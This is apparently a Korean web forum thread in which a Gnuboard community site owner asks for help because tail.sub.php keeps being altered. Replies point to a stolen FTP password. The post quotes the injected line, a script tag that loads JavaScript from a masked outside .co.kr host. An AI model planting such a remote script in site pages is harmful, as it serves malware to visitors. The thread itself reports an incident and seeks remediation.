누가 자꾸 tail.sub.php 파일을 변조합니다 진행중 정보
누가 자꾸 tail.sub.php 파일을 변조합니다 진행중본문
안녕하세요 그누보드 전문가님들
조그맣게 커뮤니티를 운영중인데 오늘 저녁부터 사이트에 접속할때마다
멀웨어 경고창이 떠서 이상하다 싶어서 파일을 살펴보다 tail.sub.php가 수정되어 있길래
열어보니 두번째줄에
<script src="http://xxxxxxxx.co.kr/xxxxxx.js"></script>
라고 해킹인지,변조인지 이상한 사이트가 적혀져 있더라구요
그래서 삭제하고 파일을 재업로드 했는데 얼마 안지나 다시 파일이 변조되어 있더라구요
이게 ftp가 뚤린건지 아님 다른 경로가 뚫린건지 모르겠는데 어떻게 해야하지를 도무지 모르겠어서
이렇게 도움을 요청합니다.
이럴때는 어떻게 대처해야하는지 고수님들 도움좀 부탁드리겠습니다.
조그맣게 커뮤니티를 운영중인데 오늘 저녁부터 사이트에 접속할때마다
멀웨어 경고창이 떠서 이상하다 싶어서 파일을 살펴보다 tail.sub.php가 수정되어 있길래
열어보니 두번째줄에
<script src="http://xxxxxxxx.co.kr/xxxxxx.js"></script>
라고 해킹인지,변조인지 이상한 사이트가 적혀져 있더라구요
그래서 삭제하고 파일을 재업로드 했는데 얼마 안지나 다시 파일이 변조되어 있더라구요
이게 ftp가 뚤린건지 아님 다른 경로가 뚫린건지 모르겠는데 어떻게 해야하지를 도무지 모르겠어서
이렇게 도움을 요청합니다.
이럴때는 어떻게 대처해야하는지 고수님들 도움좀 부탁드리겠습니다.
댓글 전체
해당 js파일 경로 쩍지로 보내주실 수 있을까요?
분석후 연락드리겠습니다
분석후 연락드리겠습니다
제 지인의 경우는 같은 상황인데 FTP 비번이 뚫렸(?)더군요. 한국인터넷진흥원에서 악성코드 체크 권유 메일 와서 확인해봤더니, 님과 같은 코드가 심어 있었고, 삭제를 해도 계속 적히길래 비번바꾸니 잠잠.
해커에게 뚫리셧네요
